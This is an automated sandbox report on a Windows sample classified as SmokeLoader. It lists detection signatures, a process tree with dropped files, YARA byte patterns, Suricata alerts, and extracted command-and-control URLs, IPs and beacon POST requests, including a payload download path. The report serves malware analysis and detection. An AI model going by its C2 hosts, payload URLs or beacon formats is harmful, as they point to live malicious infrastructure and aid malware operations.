Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wBgwzVbZuV.exe

Overview

General Information

Sample name:wBgwzVbZuV.exe
renamed because original name is a hash value
Original sample name:a50c051c3beb22a0f9ce8694fb4d0bab.exe
Analysis ID:1531374
MD5:a50c051c3beb22a0f9ce8694fb4d0bab
SHA1:40f81c46df2c9da0157bc9a9270c9a171db284c9
SHA256:1c17f70cfd875c4780045bf42e6fa42c98a23b51e7869774f6c388dde6c50f77
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wBgwzVbZuV.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\wBgwzVbZuV.exe" MD5: A50C051C3BEB22A0F9CE8694FB4D0BAB)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • F421.exe (PID: 5180 cmdline: C:\Users\user\AppData\Local\Temp\F421.exe MD5: 500B5F7BBE44E1C2370628C67AC45F67)
  • wehrbbi (PID: 5772 cmdline: C:\Users\user\AppData\Roaming\wehrbbi MD5: A50C051C3BEB22A0F9CE8694FB4D0BAB)
  • rghrbbi (PID: 3636 cmdline: C:\Users\user\AppData\Roaming\rghrbbi MD5: 500B5F7BBE44E1C2370628C67AC45F67)
  • wehrbbi (PID: 3960 cmdline: C:\Users\user\AppData\Roaming\wehrbbi MD5: A50C051C3BEB22A0F9CE8694FB4D0BAB)
  • rghrbbi (PID: 3900 cmdline: C:\Users\user\AppData\Roaming\rghrbbi MD5: 500B5F7BBE44E1C2370628C67AC45F67)
  • cleanup
{"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x3879:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 19 entries

      System Summary

      barindex
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wehrbbi, CommandLine: C:\Users\user\AppData\Roaming\wehrbbi, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wehrbbi, NewProcessName: C:\Users\user\AppData\Roaming\wehrbbi, OriginalFileName: C:\Users\user\AppData\Roaming\wehrbbi, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\wehrbbi, ProcessId: 5772, ProcessName: wehrbbi
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-11T06:37:27.331919+020020391031A Network Trojan was detected192.168.2.450549116.58.10.6080TCP
      2024-10-11T06:37:28.608795+020020391031A Network Trojan was detected192.168.2.450550116.58.10.6080TCP
      2024-10-11T06:37:29.867486+020020391031A Network Trojan was detected192.168.2.450551116.58.10.6080TCP
      2024-10-11T06:37:31.120563+020020391031A Network Trojan was detected192.168.2.450552116.58.10.6080TCP
      2024-10-11T06:37:32.627921+020020391031A Network Trojan was detected192.168.2.450553116.58.10.6080TCP
      2024-10-11T06:37:33.887842+020020391031A Network Trojan was detected192.168.2.450554116.58.10.6080TCP
      2024-10-11T06:37:35.170910+020020391031A Network Trojan was detected192.168.2.450555116.58.10.6080TCP
      2024-10-11T06:37:36.456953+020020391031A Network Trojan was detected192.168.2.450556116.58.10.6080TCP
      2024-10-11T06:37:37.720039+020020391031A Network Trojan was detected192.168.2.450557116.58.10.6080TCP
      2024-10-11T06:37:39.029454+020020391031A Network Trojan was detected192.168.2.450558116.58.10.6080TCP
      2024-10-11T06:37:40.279368+020020391031A Network Trojan was detected192.168.2.450559116.58.10.6080TCP
      2024-10-11T06:37:41.538479+020020391031A Network Trojan was detected192.168.2.450560116.58.10.6080TCP
      2024-10-11T06:37:42.807815+020020391031A Network Trojan was detected192.168.2.450561116.58.10.6080TCP
      2024-10-11T06:37:44.079413+020020391031A Network Trojan was detected192.168.2.450562116.58.10.6080TCP
      2024-10-11T06:37:45.349627+020020391031A Network Trojan was detected192.168.2.450563116.58.10.6080TCP
      2024-10-11T06:37:46.644516+020020391031A Network Trojan was detected192.168.2.450564116.58.10.6080TCP
      2024-10-11T06:37:47.887306+020020391031A Network Trojan was detected192.168.2.450565116.58.10.6080TCP
      2024-10-11T06:37:49.178180+020020391031A Network Trojan was detected192.168.2.450566116.58.10.6080TCP
      2024-10-11T06:37:50.445145+020020391031A Network Trojan was detected192.168.2.450567116.58.10.6080TCP
      2024-10-11T06:37:51.737702+020020391031A Network Trojan was detected192.168.2.450568116.58.10.6080TCP
      2024-10-11T06:37:53.006273+020020391031A Network Trojan was detected192.168.2.450569116.58.10.6080TCP
      2024-10-11T06:37:54.248895+020020391031A Network Trojan was detected192.168.2.450570116.58.10.6080TCP
      2024-10-11T06:37:55.768968+020020391031A Network Trojan was detected192.168.2.450571116.58.10.6080TCP
      2024-10-11T06:37:57.008913+020020391031A Network Trojan was detected192.168.2.450573116.58.10.6080TCP
      2024-10-11T06:38:00.041549+020020391031A Network Trojan was detected192.168.2.450581116.58.10.6080TCP
      2024-10-11T06:38:01.304385+020020391031A Network Trojan was detected192.168.2.450592116.58.10.6080TCP
      2024-10-11T06:38:02.605345+020020391031A Network Trojan was detected192.168.2.450598116.58.10.6080TCP
      2024-10-11T06:38:03.860532+020020391031A Network Trojan was detected192.168.2.450609116.58.10.6080TCP
      2024-10-11T06:38:05.389156+020020391031A Network Trojan was detected192.168.2.450615116.58.10.6080TCP
      2024-10-11T06:38:06.633083+020020391031A Network Trojan was detected192.168.2.450626116.58.10.6080TCP
      2024-10-11T06:38:07.949302+020020391031A Network Trojan was detected192.168.2.450636116.58.10.6080TCP
      2024-10-11T06:38:09.233415+020020391031A Network Trojan was detected192.168.2.450643116.58.10.6080TCP
      2024-10-11T06:38:10.505968+020020391031A Network Trojan was detected192.168.2.450654116.58.10.6080TCP
      2024-10-11T06:38:12.057886+020020391031A Network Trojan was detected192.168.2.450664116.58.10.6080TCP
      2024-10-11T06:39:21.577978+020020391031A Network Trojan was detected192.168.2.450850116.58.10.6080TCP
      2024-10-11T06:39:28.718450+020020391031A Network Trojan was detected192.168.2.450851116.58.10.6080TCP
      2024-10-11T06:39:36.316985+020020391031A Network Trojan was detected192.168.2.450852116.58.10.6080TCP
      2024-10-11T06:39:44.999341+020020391031A Network Trojan was detected192.168.2.450853116.58.10.6080TCP
      2024-10-11T06:39:55.431116+020020391031A Network Trojan was detected192.168.2.450854116.58.10.6080TCP
      2024-10-11T06:40:08.776918+020020391031A Network Trojan was detected192.168.2.450855186.233.231.4580TCP
      2024-10-11T06:40:21.583692+020020391031A Network Trojan was detected192.168.2.450856186.233.231.4580TCP
      2024-10-11T06:40:33.594959+020020391031A Network Trojan was detected192.168.2.450857186.233.231.4580TCP
      2024-10-11T06:40:47.322863+020020391031A Network Trojan was detected192.168.2.450858186.233.231.4580TCP
      2024-10-11T06:40:59.977004+020020391031A Network Trojan was detected192.168.2.450859186.233.231.4580TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
      Source: nwgrus.ruVirustotal: Detection: 12%Perma Link
      Source: C:\Users\user\AppData\Roaming\wehrbbiReversingLabs: Detection: 42%
      Source: wBgwzVbZuV.exeReversingLabs: Detection: 42%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Local\Temp\F421.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\wehrbbiJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\rghrbbiJoe Sandbox ML: detected
      Source: wBgwzVbZuV.exeJoe Sandbox ML: detected
      Source: wBgwzVbZuV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:50575 version: TLS 1.2

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50549 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50565 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50561 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50555 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50566 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50550 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50554 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50568 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50564 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50556 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50562 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50570 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50560 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50551 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50558 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50581 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50609 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50563 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50573 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50553 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50592 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50567 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50598 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50571 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50636 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50552 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50654 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50615 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50559 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50557 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50643 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50626 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50664 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50569 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50850 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50852 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50851 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50854 -> 116.58.10.60:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50857 -> 186.233.231.45:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50856 -> 186.233.231.45:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50858 -> 186.233.231.45:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50859 -> 186.233.231.45:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50855 -> 186.233.231.45:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50853 -> 116.58.10.60:80
      Source: C:\Windows\explorer.exeNetwork Connect: 186.233.231.45 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 116.58.10.60 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
      Source: Malware configuration extractorURLs: https://ninjahallnews.com/search.php
      Source: Malware configuration extractorURLs: https://fallhandbat.com/search.php
      Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
      Source: Joe Sandbox ViewASN Name: SolucaoNetworkProvedorLtdaBR SolucaoNetworkProvedorLtdaBR
      Source: Joe Sandbox ViewASN Name: NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK
      Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
      Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
      Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxxmebwwqsmoglpj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwmajrkjinpjtb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vdgnwysksin.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mnxigvfksbogudg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kixruudymeg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://noqnaadfmcqiqh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xgcqobnogyn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkdovmgcqkpkau.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jdcljhdxiwgilrm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ktpfbekvdosn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://egphyymsnbbon.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aedejmbyprcj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hvawqwmqdyhhbuvh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmvtliwpktklau.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://faxctnknnkusgdi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lsncadftghcgkll.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lpydjvblecmmk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iepqpqyryvhgtcv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oenjfnfpfgckga.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nufhygmjiointcnq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hsidmskxdmqv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tnccrjrkqwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttovpyftqljtjbyu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rajflukkjfv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://toscrejivnmddao.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xkeohrrlcufnjh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmgqjswjxdwbrcxb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kfvlpgkryjcljktf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcmpeqxglbq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xorfrgussemjiclx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpaltdgxnlbrc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ourjknfcrerebmfy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: nwgrus.ru
